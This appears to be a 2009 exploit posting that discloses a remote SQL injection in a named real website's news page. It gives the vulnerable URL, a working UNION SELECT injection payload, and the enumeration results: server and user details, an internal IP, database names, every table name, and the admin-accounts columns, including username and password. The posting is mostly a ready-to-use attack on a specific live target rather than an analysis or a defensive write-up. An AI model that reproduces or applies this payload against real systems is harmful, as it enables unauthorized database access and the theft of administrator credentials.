securitycoverage-sql.txt
Posted on 28 January 2009
----------------------------------------------------------------------------------------------- [+] Securitycoverage.com suffers from a remote SQL injection vulnerability [+] Author: Rohit Bansal --------------------------------------------------------------------------------------- Host Information Server = Apache Version = 5.0.66sp1-enterprise-gpl-log Powered by = ASP.NET,PHP/4.4.7 Current User = web@172.25.0.86 Current Database = scmain Supports Union = yes Union Columns = 5 Url| http://www.securitycoverage.com/news/index.php?id=63 Vuln: http://www.securitycoverage.com/news/index.php?id=63+and+1=0+ Union Select 1 , UNHEX(HEX([visible])) ,3,4,5 Comment: -- Visible Column: 2 Hexed: True Database:scmain information_schema sccustomers scmain screport screport_nav screport_pcscode screport_remote_admin scsurvey Tables:scadmin_accounts assistance assistance_times careers chat_conversations chat_conversations_content comodo_log deleted_assistance deleted_assistance_times flash_news login mac_problem_area_values modules news page_content page_name pclive_problem_area_values pcsupport_chat_discussions problem_area_values scadmin_access scadmin_accounts settings solution_ratings solutions statistics support_plus_problem_area_values tech_news testimonials_content testimonials_type ticket_deletion_reasons timer tracker web_chat_discussions Columns: Table scadmin_accounts username is_online first_name last_name display_name last_login new_password queue_type password supervisor_id --------------------------------------------------------------------------------------- [+]^Rohit Bansal [rohitisback@gmail.com] [+] Schap.org, Infysec,Evilfinger, Secure 'n Safe ---------------------------------------------------------------------------------------
